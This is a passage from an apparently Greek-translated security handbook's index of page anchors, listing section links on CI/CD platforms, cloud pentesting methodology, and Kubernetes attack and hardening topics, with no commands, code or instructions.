κής-Καταγραφή-και-Παρακολούθηση","pentesting-ci-cd/serverless.com-security.html#Ανασφαλείς-Ρυθμίσεις-api-gateway","pentesting-ci-cd/serverless.com-security.html#Ανεπαρκής-Απομόνωση-Λειτουργιών","pentesting-ci-cd/serverless.com-security.html#Ανεπαρκής-Προστασία-Δεδομένων","pentesting-ci-cd/serverless.com-security.html#Έλλειψη-Κατάλληλης-Διαχείρισης-Σφαλμάτων","pentesting-ci-cd/serverless.com-security.html#Ανασφαλείς-Πρακτικές-Ανάπτυξης","pentesting-ci-cd/serverless.com-security.html#Ευπάθειες-σε-Πρόσθετα-και-Επεκτάσεις","pentesting-ci-cd/serverless.com-security.html#Έκθεση-Ευαίσθητων-Τερματικών-Σημείων","pentesting-ci-cd/serverless.com-security.html#Υπερβολικές-Άδειες-για-Μέλη-Ομάδας-και-Εξωτερικούς-Συνεργάτες","pentesting-ci-cd/serverless.com-security.html#Ασφάλεια-Κλειδιών-Πρόσβασης-και-Κλειδιών-Άδειας","pentesting-ci-cd/supabase-security.html#Ασφάλεια-supabase","pentesting-ci-cd/supabase-security.html#Βασικές-Πληροφορίες","pentesting-ci-cd/supabase-security.html#Υποτομέας","pentesting-ci-cd/supabase-security.html#Διαμόρφωση-βάσης-δεδομένων","pentesting-ci-cd/supabase-security.html#Διαμόρφωση-api","pentesting-ci-cd/supabase-security.html#anon-api-keys","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#ansible-tower--awx--automation-controller-security","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#basic-information","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#differences","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#tech-stack","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#logical-components","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#job-execution-flow","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#awx-lab-creation-for-testing","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#rbac","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#supported-roles","pentesting-ci-cd/vercel-security.html#vercel","pentesting-ci-cd/vercel-security.html#basic-information","pentesting-ci-cd/vercel-security.html#project-settings","pentesting-ci-cd/vercel-security.html#general","pentesting-ci-cd/vercel-security.html#domains","pentesting-ci-cd/vercel-security.html#environments","pentesting-ci-cd/vercel-security.html#environment-variables","pentesting-ci-cd/vercel-security.html#git","pentesting-ci-cd/vercel-security.html#integrations","pentesting-ci-cd/vercel-security.html#deployment-protection","pentesting-ci-cd/vercel-security.html#functions","pentesting-ci-cd/vercel-security.html#data-cache","pentesting-ci-cd/vercel-security.html#cron-jobs","pentesting-ci-cd/vercel-security.html#log-drains","pentesting-ci-cd/vercel-security.html#security","pentesting-ci-cd/vercel-security.html#advanced","pentesting-ci-cd/vercel-security.html#project-firewall","pentesting-ci-cd/vercel-security.html#firewall","pentesting-ci-cd/vercel-security.html#custom-rules--ip-blocking","pentesting-ci-cd/vercel-security.html#project-deployment","pentesting-ci-cd/vercel-security.html#source","pentesting-ci-cd/vercel-security.html#skew-protection","pentesting-ci-cd/vercel-security.html#team-settings","pentesting-ci-cd/vercel-security.html#general-1","pentesting-ci-cd/vercel-security.html#billing","pentesting-ci-cd/vercel-security.html#members","pentesting-ci-cd/vercel-security.html#access-groups","pentesting-ci-cd/vercel-security.html#log-drains-1","pentesting-ci-cd/vercel-security.html#security--privacy","pentesting-ci-cd/vercel-security.html#secure-compute","pentesting-ci-cd/vercel-security.html#environment-variables-1","pentesting-ci-cd/todo.html#todo","pentesting-cloud/pentesting-cloud-methodology.html#pentesting-cloud-methodology","pentesting-cloud/pentesting-cloud-methodology.html#basic-methodology","pentesting-cloud/pentesting-cloud-methodology.html#multi-cloud-tools","pentesting-cloud/pentesting-cloud-methodology.html#purplepanda","pentesting-cloud/pentesting-cloud-methodology.html#prowler","pentesting-cloud/pentesting-cloud-methodology.html#cloudsploit","pentesting-cloud/pentesting-cloud-methodology.html#scoutsuite","pentesting-cloud/pentesting-cloud-methodology.html#steampipe","pentesting-cloud/pentesting-cloud-methodology.html#cs-suite","pentesting-cloud/pentesting-cloud-methodology.html#nessus","pentesting-cloud/pentesting-cloud-methodology.html#cloudlist","pentesting-cloud/pentesting-cloud-methodology.html#χαρτογράφηση","pentesting-cloud/pentesting-cloud-methodology.html#starbase","pentesting-cloud/pentesting-cloud-methodology.html#skyark","pentesting-cloud/pentesting-cloud-methodology.html#cloud-brute","pentesting-cloud/pentesting-cloud-methodology.html#cloudfox","pentesting-cloud/pentesting-cloud-methodology.html#Περισσότερες-λίστες-εργαλείων-ασφάλειας-cloud","pentesting-cloud/pentesting-cloud-methodology.html#google","pentesting-cloud/pentesting-cloud-methodology.html#gcp","pentesting-cloud/pentesting-cloud-methodology.html#workspace","pentesting-cloud/pentesting-cloud-methodology.html#aws","pentesting-cloud/pentesting-cloud-methodology.html#azure","pentesting-cloud/pentesting-cloud-methodology.html#attack-graph","pentesting-cloud/pentesting-cloud-methodology.html#office365","pentesting-cloud/kubernetes-security/index.html#kubernetes-pentesting","pentesting-cloud/kubernetes-security/index.html#kubernetes-basics","pentesting-cloud/kubernetes-security/index.html#labs-to-practice-and-learn","pentesting-cloud/kubernetes-security/index.html#hardening-kubernetes--automatic-tools","pentesting-cloud/kubernetes-security/index.html#manual-kubernetes-pentest","pentesting-cloud/kubernetes-security/index.html#from-the-outside","pentesting-cloud/kubernetes-security/index.html#enumeration-inside-a-pod","pentesting-cloud/kubernetes-security/index.html#enumerating-kubernetes-with-credentials","pentesting-cloud/kubernetes-security/index.html#privesc-to-a-different-namespace","pentesting-cloud/kubernetes-security/index.html#from-kubernetes-to-the-cloud","pentesting-cloud/kubernetes-security/kubernetes-basics.html#kubernetes-basics","pentesting-cloud/kubernetes-security/kubernetes-basics.html#kubernetes-basics-1","pentesting-cloud/kubernetes-security/kubernetes-basics.html#architecture--basics","pentesting-cloud/kubernetes-security/kubernetes-basics.html#Τι-κάνει-το-kubernetes","pentesting-cloud/kubernetes-security/kubernetes-basics.html#architecture","pentesting-cloud/kubernetes-security/kubernetes-basics.html#pki-infrastructure---certificate-authority-ca","pentesting-cloud/kubernetes-security/kubernetes-basics.html#basic-actions","pentesting-cloud/kubernetes-security/kubernetes-basics.html#minikube","pentesting-cloud/kubernetes-security/kubernetes-basics.html#kubectl-Βασικά","pentesting-cloud/kubernetes-security/kubernetes-basics.html#minikube-dashboard","pentesting-cloud/kubernetes-security/kubernetes-basics.html#yaml-configuration-files-examples","pentesting-cloud/kubernetes-security/kubernetes-basics.html#namespaces","pentesting-cloud/kubernetes-security/kubernetes-basics.html#helm","pentesting-cloud/kubernetes-security/kubernetes-basics.html#kubernetes-μυστικά","pentesting-cloud/kubernetes-security/kubernetes-basics.html#Μυστικά-στο-etcd","pentesting-cloud/kubernetes-security/kubernetes-basics.html#Αναφορές","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#pentesting-kubernetes-services","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#finding-exposed-pods-with-osint","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#how-kubernetes-exposes-services","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#finding-exposed-pods-via-port-scanning","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#nmap","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#kube-apiserver","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#kubelet-api","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#etcd-api","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#tiller","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#cadvisor","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#nodeport","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#Ευάλωτες-Καταχωρίσεις","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#Πρόσβαση-Ανώνυμου-Χρήστη-στο-kube-apiserver","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#Έλεγχος-για-Ανώνυμη-Πρόσβαση-στο-etcd","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#kubelet-rce","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#Έλεγχος-Έκθεσης-Πληροφοριών-kubelet-Μόνο-Ανάγνωση","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#Αναφορές","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.html#kubelet-authentication--authorization","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.html#kubelet-authentication","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.html#kubelet-authorization","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.html#references","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#exposing-services-in-kubernetes","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#automatic-enumeration","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#clusterip","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#nodeport","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#loadbalancer","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#external-ips","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#externalname","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#ingress","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#Αναφορές","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#attacking-kubernetes-from-inside-a-pod","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#pod-breakout","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#escaping-from-the-pod","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#abusing-kubernetes-privileges","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#abusing-cloud-privileges","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#search-vulnerable-network-services","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#services","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#Σάρωση","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#sniffing","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#network-spoofing","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#node-dos","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#node-post-exploitation","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#find-node-kubeconfig","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#Κλέψε-Μυστικά","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#privileged-daemonsets","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#pivot-to-cloud","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#steal-etcd","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#staticmirrored-pods-persistence","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#Διαγραφή-pods--μη-προγραμματισμένα-nodes","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#Αυτόματα-Εργαλεία","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#kubernetes-enumeration","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#kubernetes-tokens","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#service-account-tokens","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#hot-pods","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#rbac","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#gui-applications","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#enumeration-cheatsheet","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#differences-between-list-and-get-verbs","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Χρησιμοποιώντας-curl","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Χρησιμοποιώντας-το-kubectl","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Τρέχουσα-Διαμόρφωση","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Λάβετε-Υποστηριζόμενους-Πόρους","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Λάβετε-Τρέχουσες-Προνομίες","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Λάβετε-ρόλους-άλλων","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Λάβετε-namespaces","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Λάβετε-μυστικά","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Λάβετε-Λογαριασμούς-Υπηρεσιών","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Λάβετε-Αναπτύξεις","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Λάβετε-pods","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Λάβετε-Υπηρεσίες","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Λάβετε-κόμβους","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Λάβετε-daemonsets","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Λάβετε-cronjob","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Λάβετε-το-configmap","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Λάβετε-Πολιτικές-Δικτύου--Πολιτικές-Δικτύου-cilium","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Πάρε-τα-Πάντα--Όλα","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Λάβετε-όλους-τους-πόρους-που-διαχειρίζεται-το-helm","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Λάβετε-τις-καταναλώσεις-pods","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Αλληλεπίδραση-με-το-cluster-χωρίς-τη-χρήση-του-kubectl","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Διαφυγή-από-το-pod","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Δημιουργία-ενός-προνομιακού-pod","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Διαγραφή-ενός-pod","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Δημιουργία-Λογαριασμού-Υπηρεσίας","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Διαγραφή-ενός-Λογαριασμού-Υπηρεσίας","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Δημιουργία-Ρόλου","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Διαγραφή-ενός-Ρόλου","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Δημιουργία-Δέσμευσης-Ρόλου","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Διαγραφή-ενός-role-binding","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Διαγραφή-ενός-Μυστικού","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Διαγραφή-ενός-Μυστικού-1","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#Αναφορές","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#kubernetes-role-based-access-controlrbac","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#role-based-access-control-rbac","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#Πρότυπα","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#Ρήματα-Κανόνων","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#Παραδείγματα","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#rolebinding-και-clusterrolebinding","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#Απαρίθμηση-rbac","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#Κατάχρηση-Ρόλωνclusterroles-για-Κλιμάκωση-Προνομίων","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#abusing-rolesclusterroles-in-kubernetes","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#privilege-escalation","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#access-any-resource-or-verb-wildcard","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Πρόσβαση-σε-οποιοδήποτε-πόρο-με-συγκεκριμένο-ρήμα","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#pod-create---steal-token","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#pod-create--escape","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#pod-create---move-to-cloud","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#createpatch-deployment-daemonsets-statefulsets-replicationcontrollers-replicasets-jobs-and-cronjobs","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#pods-exec","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#port-forward","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#hosts-writable-varlog-escape","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Υποκατάσταση-προνομιακών-λογαριασμών","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#listing-secrets","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Δημιουργία-και-Ανάγνωση-Μυστικών","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Ανάγνωση-ενός-μυστικού--βίαιη-επίθεση-σε-αναγνωριστικά-token","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Αιτήματα-Υπογραφής-Πιστοποιητικών","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#aws-eks-aws-auth-configmaps","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#escalating-in-gke","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#create-serviceaccounts-token","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#ephemeralcontainers","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#validatingwebhookconfigurations-or-mutatingwebhookconfigurations","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#escalate","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#nodes-proxy","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#delete-pods--unschedulable-nodes","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Κατάσταση-Υπηρεσιών-cve-2020-8554","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Κατάσταση-Κόμβων-και-pods","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Ενσωματωμένη-Πρόληψη-Κλιμάκωσης-Προνομίων","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Λάβετε--Ενημερώστε-rolebindingsclusterrolebindings","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Άλλες-Επιθέσεις","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Εφαρμογή-proxy-sidecar","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Κακόβουλος-Ελεγκτής-Εισόδου","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Παράκαμψη-opa-gatekeeper","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Καλές-Πρακτικές","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Απενεργοποίηση-Αυτοματισμού-των-tokens-Λογαριασμού-Υπηρεσίας","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Περιοριστική-Ανάθεση-Χρηστών-σε-rolebindingsclusterrolebindings","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Ρόλοι-Ειδικά-για-namespace-σε-Σύγκριση-με-Ρόλους-cluster-wide","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Χρήση-αυτοματοποιημένων-εργαλείων","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#Αναφορές","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.html#pod-escape-privileges","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.html#privileged-and-hostpid","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#kubernetes-roles-abuse-lab","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#Δημιουργία-pod---Κλιμάκωση-σε-ns-sas","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#Δημιουργία-daemonset","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#patch-daemonset","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#Δεν-λειτουργεί","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#ΔημιουργίαΕπικαιροποίηση-Δεσμών","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#bind-explicitly-bindings","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#Δημιουργία-αυθαίρετων-ρόλων","pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.html#kubernetes-namespace-escalation","pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.html#abuse-k8s-privileges","pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.html#escape-to-the-node","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#external-secret-operator","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#disclaimer","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#prerequisites","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#gathering-information-about-existing-clustersecretstore","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#externalsecret-enumeration","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#Συναρμολόγηση-των-κομματιών","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#Αναφορές","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#kubernetes-pivoting-to-clouds","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#gcp","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#mounting-gcp-sa-keys-as-secret","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#relating-gsa-json-to-ksa-secret","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#gke-workload-identity","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#aws","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#kiam--kube2iam-iam-ρόλος-για-pods","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#iam-Ρόλος-για-Λογαριασμούς-Υπηρεσιών-k8s-μέσω-oidc","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#Βρείτε-pods-και-sas-με-iam-Ρόλους-στο-cluster","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#node-iam-role","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#Κλέψε-το-token-iam-Ρόλου","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#Αναφορές","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#kubernetes-network-attacks","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#introduction","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#Βασική-Δικτύωση-kubernetes","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#arp","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#dns","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#arp-spoofing-σε-pods-στον-ίδιο-Κόμβο","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#scapy","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#arpspoof","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#dns-spoofing","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#capturing-traffic","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#references","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubernetes-hardening","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#Εργαλεία-για-ανάλυση-ενός-cluster","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubescape","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kube-bench","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubeaudit","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kube-hunter","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubei","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubiscan","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#managed-kubernetes-auditing-toolkit","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#audit-iac-code","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#popeye","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kics","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#checkov","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kube-score","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#tips","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubernetes-podsecuritycontext-και-securitycontext","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubernetes-api-hardening","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#securitycontext-hardening","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#Γενική-Σκληροποίηση","pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.html#kubernetes-securitycontexts","pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.html#podsecuritycontext","pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.html#securitycontext","pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.html#references","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/index.html#kubernetes---opa-gatekeeper","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/index.html#Ορισμός","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/index.html#Εφαρμογή-Περιορισμού","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/index.html#Αναφορές","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#kubernetes-opa-gatekeeper-bypass","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#Κατάχρηση-κακής-διαμόρφωσης","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#Καταμέτρηση-κανόνων","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#Εξαιρούμενα-namespaces","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#bypass","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#Κατάχρηση-validatingwebhookconfiguration","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#Αναφορές","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#kubernetes-kyverno","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#Ορισμός","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#Χρήσεις","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#Παράδειγμα-clusterpolicy-και-Πολιτική","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#references","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#kubernetes-kyverno-bypass","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#Κατάχρηση-κακής-διαμόρφωσης-πολιτικών","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#Καταμέτρηση-κανόνων","pentesting-cloud/kuberne